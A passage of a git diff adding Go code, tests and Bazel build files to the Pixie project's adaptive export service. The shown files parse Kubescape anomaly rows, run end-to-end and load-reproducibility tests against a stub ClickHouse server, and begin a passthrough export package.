+// computes hash + opens active row → real Sink HTTP-POSTs INSERT to
+// adaptive_attribution. Assert the resulting body carries the right hash.
+func TestE2E_PushFlow_AttributionRowArrives(t *testing.T) {
+ stub := &stubClickHouse{kubescape: []map[string]any{canonicalKubescapeRow()}}
+ srv := httptest.NewServer(http.HandlerFunc(stub.handle))
+ defer srv.Close()
+
+ trg, err := trigger.New(trigger.Config{
+ Endpoint: srv.URL,
+ Hostname: "node-1",
+ PollInterval: 30 * time.Millisecond,
+ })
+ if err != nil {
+ t.Fatalf("trigger.New: %v", err)
+ }
+ snk, err := sink.New(sink.Config{Endpoint: srv.URL})
+ if err != nil {
+ t.Fatalf("sink.New: %v", err)
+ }
+ cfg := controller.Config{Hostname: "node-1", Before: time.Minute, After: time.Minute}
+ ctl := controller.New(trg, snk, cfg, nil)
+
+ ctx, cancel := context.WithCancel(context.Background())
+ done := make(chan struct{})
+ go func() { _ = ctl.Run(ctx); close(done) }()
+ defer func() {
+ cancel()
+ select {
+ case <-done:
+ case <-time.After(2 * time.Second):
+ t.Fatalf("controller did not stop within 2s of cancel")
+ }
+ }()
+
+ deadline := time.Now().Add(2 * time.Second)
+ for time.Now().Before(deadline) && len(stub.bodies()) == 0 {
+ time.Sleep(5 * time.Millisecond)
+ }
+ bodies := stub.bodies()
+ if len(bodies) == 0 {
+ t.Fatalf("no INSERTs reached stub-CH within 2s")
+ }
+
+ wantHash := string(anomaly.Hash(anomaly.Target{
+ PID: 106040, Comm: "redis-server",
+ Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis",
+ }))
+ matched := false
+ for _, b := range bodies {
+ if strings.Contains(string(b), `"anomaly_hash":"`+wantHash+`"`) &&
+ strings.Contains(string(b), `"hostname":"node-1"`) &&
+ strings.Contains(string(b), `"namespace":"redis"`) &&
+ strings.Contains(string(b), `"pid":106040`) {
+ matched = true
+ break
+ }
+ }
+ if !matched {
+ t.Fatalf("no INSERT body had the expected attribution shape; bodies=\n%s", joinBodies(bodies))
+ }
+}
+
+func joinBodies(bs [][]byte) string {
+ out := make([]string, len(bs))
+ for i, b := range bs {
+ out[i] = string(b)
+ }
+ return strings.Join(out, "\n---\n")
+}
diff --git a/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go b/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go
new file mode 100644
index 00000000000..3f88e90bf96
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go
@@ -0,0 +1,256 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// L1 — hermetic load-test layer for the AE write surface.
+//
+// This is the deterministic, in-process counterpart to the live (L3) rig
+// experiments in /home/croedig/pixie/aeload. It exercises the SAME real
+// Trigger + Controller + Sink chain as e2e_test.go, but feeds Pixie's data
+// plane from a MOCK PixieQuerier returning a CANNED row set. Both the kubescape
+// trigger fixture and the Pixie capture are therefore fully controlled, so the
+// AE write surface — control plane (adaptive_attribution) AND data plane
+// (per-protocol-table rows + bytes) — is a pure function of the inputs.
+//
+// Reproducibility is proven by running the whole chain REPS times and asserting
+// that every per-table row count, byte total, and the attribution count is
+// identical across all reps (std = 0 / a single distinct value). Single-pull is
+// forced via PushRefreshInterval = -1 (single-shot), the same effect the L3
+// config achieves on the rig — so the non-deduping MergeTree protocol tables
+// never get duplicate re-inserts.
+package e2e
+
+import (
+ "context"
+ "fmt"
+ "net/http"
+ "net/http/httptest"
+ "regexp"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger"
+)
+
+// newStubServer starts an httptest server backed by the stub-CH handler.
+func newStubServer(s *stubClickHouse) *httptest.Server {
+ return httptest.NewServer(http.HandlerFunc(s.handle))
+}
+
+// sqls returns a copy of the recorded INSERT query strings, index-aligned with
+// bodies().
+func (s *stubClickHouse) sqls() []string {
+ s.mu.Lock()
+ defer s.mu.Unlock()
+ out := make([]string, len(s.insertedSQL))
+ copy(out, s.insertedSQL)
+ return out
+}
+
+// fixedClock pins now() so the window math is identical every rep.
+type fixedClock struct{ t time.Time }
+
+func (f fixedClock) Now() time.Time { return f.t }
+
+// cannedQuerier is the mock Pixie data plane: it returns a fixed number of
+// fixed rows per protocol table, parsed from the table name embedded in the
+// PxL (px.DataFrame(table='')). Everything else returns 0 rows — exactly how
+// a silent pod looks to real Pixie.
+type cannedQuerier struct {
+ perTable map[string]int // table -> row count to synthesize
+}
+
+var tableInPxL = regexp.MustCompile(`table='([^']+)'`)
+
+func (q *cannedQuerier) Query(_ context.Context, pxl string) ([]map[string]any, error) {
+ m := tableInPxL.FindStringSubmatch(pxl)
+ if m == nil {
+ return nil, fmt.Errorf("cannedQuerier: no table in pxl: %s", pxl)
+ }
+ n := q.perTable[m[1]]
+ rows := make([]map[string]any, 0, n)
+ for i := 0; i < n; i++ {
+ // Deterministic, fully-specified row. encoding/json sorts map keys,
+ // so the serialized bytes are byte-identical every rep.
+ rows = append(rows, map[string]any{
+ "time_": 1744477360303026359 + int64(i),
+ "namespace": "aeload",
+ "pod": "aeload/gen-l1",
+ "req_path": fmt.Sprintf("/ping/%d", i),
+ "table": m[1],
+ })
+ }
+ return rows, nil
+}
+
+// counts holds the per-rep measurement of what reached "ClickHouse".
+type counts struct {
+ rowsByTable map[string]int
+ bytesByTable map[string]int
+ attribution int
+}
+
+// measure parses the stub-CH insert bodies into per-table row/byte counts.
+func measure(sqls []string, bodies [][]byte) counts {
+ c := counts{rowsByTable: map[string]int{}, bytesByTable: map[string]int{}}
+ insertRe := regexp.MustCompile(`INSERT INTO forensic_db\.(\w+) FORMAT JSONEachRow`)
+ for i, q := range sqls {
+ m := insertRe.FindStringSubmatch(q)
+ if m == nil {
+ continue
+ }
+ table := m[1]
+ body := bodies[i]
+ nrows := 0
+ for _, line := range strings.Split(strings.TrimRight(string(body), "\n"), "\n") {
+ if strings.TrimSpace(line) != "" {
+ nrows++
+ }
+ }
+ if table == "adaptive_attribution" {
+ c.attribution += nrows
+ continue
+ }
+ c.rowsByTable[table] += nrows
+ c.bytesByTable[table] += len(body)
+ }
+ return c
+}
+
+// runOnce drives the full Trigger→Controller→Sink chain against a fresh stub-CH
+// serving exactly one kubescape row, with the canned Pixie data plane, and
+// returns the measured AE write surface.
+func runOnce(t *testing.T, perTable map[string]int) counts {
+ t.Helper()
+ stub := &stubClickHouse{kubescape: []map[string]any{canonicalKubescapeRow()}}
+ srv := newStubServer(stub)
+ defer srv.Close()
+
+ trg, err := trigger.New(trigger.Config{
+ Endpoint: srv.URL,
+ Hostname: "node-1",
+ PollInterval: 10 * time.Millisecond,
+ })
+ if err != nil {
+ t.Fatalf("trigger.New: %v", err)
+ }
+ snk, err := sink.New(sink.Config{Endpoint: srv.URL})
+ if err != nil {
+ t.Fatalf("sink.New: %v", err)
+ }
+
+ tables := make([]string, 0, len(perTable))
+ for tn := range perTable {
+ tables = append(tables, tn)
+ }
+ cfg := controller.Config{
+ Hostname: "node-1",
+ Before: time.Minute,
+ After: time.Minute,
+ PushPixieTables: tables,
+ PushRefreshInterval: -1, // single-shot: exactly one pull, no MergeTree dup inflation
+ }
+ clk := fixedClock{t: time.Unix(1744477370, 0)} // > event_time, so window is open
+ ctl := controller.New(trg, snk, cfg, clk).WithPixieQuerier(&cannedQuerier{perTable: perTable})
+
+ ctx, cancel := context.WithCancel(context.Background())
+ done := make(chan struct{})
+ go func() { _ = ctl.Run(ctx); close(done) }()
+
+ // Wait until the attribution row AND all expected protocol-table inserts
+ // have landed (or timeout). Expected protocol inserts = one per table with
+ // a non-zero canned count.
+ wantTables := 0
+ for _, n := range perTable {
+ if n > 0 {
+ wantTables++
+ }
+ }
+ deadline := time.Now().Add(3 * time.Second)
+ for time.Now().Before(deadline) {
+ c := measure(stub.sqls(), stub.bodies())
+ if c.attribution >= 1 && len(c.rowsByTable) >= wantTables {
+ break
+ }
+ time.Sleep(5 * time.Millisecond)
+ }
+ cancel()
+ select {
+ case <-done:
+ case <-time.After(2 * time.Second):
+ t.Fatalf("controller did not stop within 2s")
+ }
+ return measure(stub.sqls(), stub.bodies())
+}
+
+// TestLoad_DataPlaneExactReproducible_L1 — the hermetic reproducibility proof.
+func TestLoad_DataPlaneExactReproducible_L1(t *testing.T) {
+ const reps = 100
+ perTable := map[string]int{
+ "http_events": 100,
+ "dns_events": 100,
+ "pgsql_events": 100,
+ }
+
+ var first counts
+ for rep := 0; rep < reps; rep++ {
+ got := runOnce(t, perTable)
+
+ // Per-rep exactness: write surface == canned input (write ⊇ read with
+ // equality) + exactly one attribution row.
+ for tbl, want := range perTable {
+ if got.rowsByTable[tbl] != want {
+ t.Fatalf("rep %d: %s rows = %d, want %d", rep, tbl, got.rowsByTable[tbl], want)
+ }
+ }
+ if got.attribution != 1 {
+ t.Fatalf("rep %d: adaptive_attribution rows = %d, want 1", rep, got.attribution)
+ }
+ if len(got.rowsByTable) != len(perTable) {
+ t.Fatalf("rep %d: unexpected tables written: %v", rep, keysOf(got.rowsByTable))
+ }
+
+ if rep == 0 {
+ first = got
+ continue
+ }
+ // Cross-rep exactness: identical rows AND bytes => std = 0 => CV = 0.
+ for tbl := range perTable {
+ if got.rowsByTable[tbl] != first.rowsByTable[tbl] {
+ t.Fatalf("rep %d: %s row count drifted: %d != %d (rep 0)", rep, tbl, got.rowsByTable[tbl], first.rowsByTable[tbl])
+ }
+ if got.bytesByTable[tbl] != first.bytesByTable[tbl] {
+ t.Fatalf("rep %d: %s byte total drifted: %d != %d (rep 0)", rep, tbl, got.bytesByTable[tbl], first.bytesByTable[tbl])
+ }
+ }
+ }
+ t.Logf("L1 reproducible across %d reps: http=%d(%dB) dns=%d(%dB) pgsql=%d(%dB) attribution=%d",
+ reps,
+ first.rowsByTable["http_events"], first.bytesByTable["http_events"],
+ first.rowsByTable["dns_events"], first.bytesByTable["dns_events"],
+ first.rowsByTable["pgsql_events"], first.bytesByTable["pgsql_events"],
+ first.attribution)
+}
+
+func keysOf(m map[string]int) []string {
+ out := make([]string, 0, len(m))
+ for k := range m {
+ out = append(out, k)
+ }
+ return out
+}
diff --git a/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel
new file mode 100644
index 00000000000..47b9b0b3481
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel
@@ -0,0 +1,37 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "kubescape",
+ srcs = ["extract.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ ],
+)
+
+pl_go_test(
+ name = "kubescape_test",
+ srcs = ["extract_test.go"],
+ embed = [":kubescape"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract.go b/src/vizier/services/adaptive_export/internal/kubescape/extract.go
new file mode 100644
index 00000000000..be51d5159c0
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/kubescape/extract.go
@@ -0,0 +1,117 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package kubescape parses the Kubescape-shaped fields of a
+// forensic_db.kubescape_logs row into the source-agnostic types used
+// downstream:
+// - anomaly.Target — workload identity (used to compute the hash)
+// - Event — Target plus event-specific fields (event_time,
+// rule id, hostname) needed for window math + persistence
+//
+// This package is the only place in the operator that knows the JSON
+// shape of RuntimeK8sDetails / RuntimeProcessDetails. Once an Event
+// has been extracted, no further code needs to care that the source
+// was Kubescape.
+package kubescape
+
+import (
+ "encoding/json"
+ "errors"
+ "fmt"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// ErrIncompleteEvent is returned by Extract when one of the required
+// fields (event_time, rule id, comm, pid) is missing or unparseable.
+// Pod and Namespace are NOT required — host-pid processes legitimately
+// run with empty pod / namespace.
+var ErrIncompleteEvent = errors.New("kubescape: incomplete event")
+
+// Row is the operator-facing shape of one forensic_db.kubescape_logs row.
+// JSON-encoded fields stay as strings — the operator parses them itself
+// to keep the ClickHouse driver layer simple.
+type Row struct {
+ EventTime uint64 // schema: event_time UInt64 (unix nanos)
+ RuleID string
+ Hostname string
+ K8sDetails string // schema: RuntimeK8sDetails String (JSON)
+ ProcessDetails string // schema: RuntimeProcessDetails String (JSON)
+}
+
+// Event is one parsed kubescape anomaly: workload identity + the bits
+// we need for time-window math and ClickHouse persistence.
+type Event struct {
+ Target anomaly.Target
+ EventTime uint64 // unix nanoseconds — propagated end-to-end
+ RuleID string // diagnostic only
+ Hostname string // node-local key
+}
+
+// k8sDetails captures only pod / namespace; ignore the rest so JSON
+// evolution upstream doesn't break us.
+type k8sDetails struct {
+ PodName string `json:"podName"`
+ PodNamespace string `json:"podNamespace"`
+}
+
+type processDetails struct {
+ ProcessTree struct {
+ PID uint64 `json:"pid"`
+ Comm string `json:"comm"`
+ } `json:"processTree"`
+}
+
+// Extract parses a Row into an Event. Required fields are EventTime,
+// RuleID, processTree.pid, processTree.comm. Pod and Namespace MAY be
+// empty (host-pid processes outside any pod). Pure: no I/O, no clock.
+func Extract(r Row) (Event, error) {
+ if r.RuleID == "" {
+ return Event{}, fmt.Errorf("%w: RuleID empty", ErrIncompleteEvent)
+ }
+ if r.EventTime == 0 {
+ return Event{}, fmt.Errorf("%w: EventTime zero", ErrIncompleteEvent)
+ }
+ // K8sDetails is OPTIONAL at parse time — host-pid events legitimately
+ // have no pod/namespace. We only error on malformed JSON.
+ var k8s k8sDetails
+ if r.K8sDetails != "" {
+ if err := json.Unmarshal([]byte(r.K8sDetails), &k8s); err != nil {
+ return Event{}, fmt.Errorf("%w: parse RuntimeK8sDetails: %v", ErrIncompleteEvent, err)
+ }
+ }
+ var proc processDetails
+ if err := json.Unmarshal([]byte(r.ProcessDetails), &proc); err != nil {
+ return Event{}, fmt.Errorf("%w: parse RuntimeProcessDetails: %v", ErrIncompleteEvent, err)
+ }
+ if proc.ProcessTree.Comm == "" {
+ return Event{}, fmt.Errorf("%w: processTree.comm empty", ErrIncompleteEvent)
+ }
+ if proc.ProcessTree.PID == 0 {
+ return Event{}, fmt.Errorf("%w: processTree.pid zero", ErrIncompleteEvent)
+ }
+ return Event{
+ Target: anomaly.Target{
+ PID: proc.ProcessTree.PID,
+ Comm: proc.ProcessTree.Comm,
+ Pod: k8s.PodName,
+ Namespace: k8s.PodNamespace,
+ },
+ EventTime: r.EventTime,
+ RuleID: r.RuleID,
+ Hostname: r.Hostname,
+ }, nil
+}
diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go
new file mode 100644
index 00000000000..90f10500d29
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go
@@ -0,0 +1,141 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package kubescape
+
+import (
+ "errors"
+ "testing"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+const canonicalK8sDetails = `{"clusterName":"bobexample","containerName":"redis","namespace":"redis","podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis","workloadName":"redis","workloadKind":"Deployment"}`
+
+const canonicalProcessDetails = `{"processTree":{"pid":106040,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":105965,"uid":999}}`
+
+func canonicalRow() Row {
+ return Row{
+ EventTime: 1744477360303026359,
+ RuleID: "R1005",
+ Hostname: "node-1",
+ K8sDetails: canonicalK8sDetails,
+ ProcessDetails: canonicalProcessDetails,
+ }
+}
+
+// TestExtract_FromCanonicalRow — pulls all four target fields plus
+// EventTime + RuleID + Hostname from a real-shape kubescape row.
+func TestExtract_FromCanonicalRow(t *testing.T) {
+ ev, err := Extract(canonicalRow())
+ if err != nil {
+ t.Fatalf("Extract: %v", err)
+ }
+ if ev.Target.PID != 106040 {
+ t.Fatalf("PID = %d", ev.Target.PID)
+ }
+ if ev.Target.Comm != "redis-server" {
+ t.Fatalf("Comm = %q", ev.Target.Comm)
+ }
+ if ev.Target.Pod != "redis-578d5dc9bd-kjj78" {
+ t.Fatalf("Pod = %q", ev.Target.Pod)
+ }
+ if ev.Target.Namespace != "redis" {
+ t.Fatalf("Namespace = %q", ev.Target.Namespace)
+ }
+ if ev.EventTime != 1744477360303026359 {
+ t.Fatalf("EventTime = %d", ev.EventTime)
+ }
+ if ev.RuleID != "R1005" || ev.Hostname != "node-1" {
+ t.Fatalf("RuleID/Hostname wrong: %+v", ev)
+ }
+}
+
+// TestExtract_AllowsEmptyPodNamespace — host-pid processes (no pod)
+// must still produce a valid Event.
+func TestExtract_AllowsEmptyPodNamespace(t *testing.T) {
+ row := canonicalRow()
+ row.K8sDetails = "" // host-pid: no k8s context
+ ev, err := Extract(row)
+ if err != nil {
+ t.Fatalf("Extract empty-k8s row: %v", err)
+ }
+ if ev.Target.Pod != "" || ev.Target.Namespace != "" {
+ t.Fatalf("expected empty Pod/Namespace, got %+v", ev.Target)
+ }
+ if ev.Target.PID != 106040 || ev.Target.Comm != "redis-server" {
+ t.Fatalf("PID/Comm lost: %+v", ev.Target)
+ }
+ // And the hash should still compute deterministically.
+ if h := anomaly.Hash(ev.Target); len(h) != 32 {
+ t.Fatalf("hash on empty-k8s target invalid: %q", h)
+ }
+}
+
+// TestExtract_StableUnderJSONReorder — re-ordering JSON keys yields
+// identical Target / Event.
+func TestExtract_StableUnderJSONReorder(t *testing.T) {
+ r := canonicalRow()
+ r.K8sDetails = `{"workloadKind":"Deployment","podNamespace":"redis","podName":"redis-578d5dc9bd-kjj78","clusterName":"bobexample"}`
+ r.ProcessDetails = `{"processTree":{"comm":"redis-server","ppid":1,"pid":106040,"cmdline":"redis-server","uid":0}}`
+ a, errA := Extract(canonicalRow())
+ b, errB := Extract(r)
+ if errA != nil || errB != nil {
+ t.Fatalf("Extract errors: a=%v b=%v", errA, errB)
+ }
+ if a.Target != b.Target {
+ t.Fatalf("Target differs under JSON reorder: %+v vs %+v", a.Target, b.Target)
+ }
+ if anomaly.Hash(a.Target) != anomaly.Hash(b.Target) {
+ t.Fatalf("Hash differs under JSON reorder")
+ }
+}
+
+// TestExtract_RequiresProcessTreeComm — empty / missing comm errors.
+func TestExtract_RequiresProcessTreeComm(t *testing.T) {
+ for _, p := range []string{"", `{"processTree":}`, `{}`, `{"processTree":{"pid":1}}`, `{"processTree":{"comm":"","pid":1}}`} {
+ row := canonicalRow()
+ row.ProcessDetails = p
+ _, err := Extract(row)
+ if !errors.Is(err, ErrIncompleteEvent) {
+ t.Fatalf("proc=%q → %v, want ErrIncompleteEvent", p, err)
+ }
+ }
+}
+
+// TestExtract_RequiresProcessTreePID — pid is required for hash uniqueness.
+func TestExtract_RequiresProcessTreePID(t *testing.T) {
+ row := canonicalRow()
+ row.ProcessDetails = `{"processTree":{"comm":"redis-server","pid":0}}`
+ _, err := Extract(row)
+ if !errors.Is(err, ErrIncompleteEvent) {
+ t.Fatalf("got %v, want ErrIncompleteEvent for pid=0", err)
+ }
+}
+
+// TestExtract_RequiresEventTimeAndRuleID — both required.
+func TestExtract_RequiresEventTimeAndRuleID(t *testing.T) {
+ r := canonicalRow()
+ r.EventTime = 0
+ if _, err := Extract(r); !errors.Is(err, ErrIncompleteEvent) {
+ t.Fatalf("EventTime=0 not rejected: %v", err)
+ }
+ r = canonicalRow()
+ r.RuleID = ""
+ if _, err := Extract(r); !errors.Is(err, ErrIncompleteEvent) {
+ t.Fatalf("RuleID='' not rejected: %v", err)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel b/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel
new file mode 100644
index 00000000000..b1cb579e5be
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel
@@ -0,0 +1,47 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "passthrough",
+ srcs = ["passthrough.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/passthrough",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/clickhouse",
+ "//src/vizier/services/adaptive_export/internal/pxl",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+pl_go_test(
+ name = "passthrough_test",
+ srcs = [
+ "compiled_test.go",
+ "passthrough_test.go",
+ "reconcile_test.go",
+ ],
+ embed = [":passthrough"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/clickhouse",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
+ "//src/vizier/services/adaptive_export/internal/sink",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go b/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go
new file mode 100644
index 00000000000..25f08022154
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go
@@ -0,0 +1,136 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package passthrough
+
+import (
+ "context"
+ "sort"
+ "sync"
+ "testing"
+ "time"
+)
+
+// syncSink records written (table → rowcount) under a mutex so it is safe
+// to assert against after the concurrent compiled tick.
+type syncSink struct {
+ mu sync.Mutex
+ got map[string]int
+}
+
+func newSyncSink() *syncSink { return &syncSink{got: map[string]int{}} }
+
+func (s *syncSink) WritePixieRows(_ context.Context, table string, rows []map[string]any) error {
+ s.mu.Lock()
+ defer s.mu.Unlock()
+ s.got[table] += len(rows)
+ return nil
+}
+
+func (s *syncSink) tables() []string {
+ s.mu.Lock()
+ defer s.mu.Unlock()
+ out := make([]string, 0, len(s.got))
+ for t := range s.got {
+ out = append(out, t)
+ }
+ sort.Strings(out)
+ return out
+}
+
+// TestNew_ExcludesHTTP2 proves http2_messages.beta is dropped from the
+// firehose set (it isn't materialised on every cluster → "Table not found"
+// spam) while another dotted-but-real table (kafka_events.beta) is kept.
+func TestNew_ExcludesHTTP2(t *testing.T) {
+ // Tables nil → defaults to clickhouse.PixieTables() which DOES list
+ // http2_messages.beta; New must strip it.
+ loop := New(tableQuerier{n: map[string]int{}}, newSyncSink(),
+ Config{Window: time.Minute, Compiled: true})
+
+ for _, tbl := range loop.cfg.Tables {
+ if tbl == "http2_messages.beta" {
+ t.Fatalf("http2_messages.beta must be excluded from passthrough tables: %v", loop.cfg.Tables)
+ }
+ }
+ if _, ok := loop.tmpl["http2_messages.beta"]; ok {
+ t.Fatalf("http2_messages.beta must not be precompiled")
+ }
+ // Sanity: a real table is still present + precompiled.
+ if _, ok := loop.tmpl["http_events"]; !ok {
+ t.Fatalf("http_events should be precompiled; tmpl=%v", loop.tmpl)
+ }
+}
+
+// TestCompiledTick_WritesAllTables exercises the concurrent precompiled
+// path: every table with rows must be written exactly once. (Running under
+// `go test -race` also asserts the fan-out is data-race free.)
+func TestCompiledTick_WritesAllTables(t *testing.T) {
+ sink := newSyncSink()
+ loop := New(
+ tableQuerier{n: map[string]int{
+ "http_events": 4,
+ "dns_events": 2,
+ "conn_stats": 7,
+ }},
+ sink,
+ Config{
+ Window: time.Minute,
+ Tables: []string{"http_events", "dns_events", "conn_stats"},
+ Compiled: true,
+ },
+ )
+ loop.tick(context.Background())
+
+ want := map[string]int{"http_events": 4, "dns_events": 2, "conn_stats": 7}
+ sink.mu.Lock()
+ defer sink.mu.Unlock()
+ if len(sink.got) != len(want) {
+ t.Fatalf("wrote %v tables, want %v", sink.got, want)
+ }
+ for tbl, n := range want {
+ if sink.got[tbl] != n {
+ t.Errorf("table %s wrote %d rows, want %d", tbl, sink.got[tbl], n)
+ }
+ }
+}
+
+// TestCompiledTick_EqualsLegacy proves the compiled path and the legacy
+// serial path write the SAME tables with the SAME row counts for identical
+// inputs — the toggle changes performance/structure, not output.
+func TestCompiledTick_EqualsLegacy(t *testing.T) {
+ rows := map[string]int{"http_events": 3, "dns_events": 5, "conn_stats": 1}
+ tables := []string{"http_events", "dns_events", "conn_stats"}
+
+ run := func(compiled bool) *syncSink {
+ sink := newSyncSink()
+ New(tableQuerier{n: rows}, sink,
+ Config{Window: time.Minute, Tables: tables, Compiled: compiled}).
+ tick(context.Background())
+ return sink
+ }
+
+ c := run(true)
+ l := run(false)
+
+ if cs, ls := c.tables(), l.tables(); len(cs) != len(ls) {
+ t.Fatalf("compiled wrote %v, legacy wrote %v", cs, ls)
+ }
+ for tbl, n := range rows {
+ if c.got[tbl] != n || l.got[tbl] != n {
+ t.Errorf("table %s: compiled=%d legacy=%d want %d", tbl, c.got[tbl], l.got[tbl], n)
+ }
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go b/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go
new file mode 100644
index 00000000000..2e551a1907b
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go
@@ -0,0 +1,284 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package passthrough is the firehose-mode counterpart to the anomaly-gated
+// adaptive write path. When enabled, a single background loop queries every
+// pixie observation table with an empty Target (no ns/pod predicate),
+// covering the configured rolling window, and writes the result via the
+// existing sink. The intent is one-shot A/B measurement: compare the
+// row-count + on-disk byte volume of forensic_db tables under ADAPTIVE_PASSTHROUGH=1
+// (Phase EVERYTHING) vs ADAPTIVE_PASSTHROUGH=0 (Phase AE-FILTER) under the
+// same load + window, yielding the AE capture fraction per table.
+//
+// This package is intentionally minimal: no anomaly gate, no ActiveSet, no
+// trigger. It reuses the same QueryFor / Adapter / Sink wiring as the rest
+// of AE so the bytes-per-row shape is comparable across phases.
+package passthrough
+
+import (
+ "context"
+ "sync"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
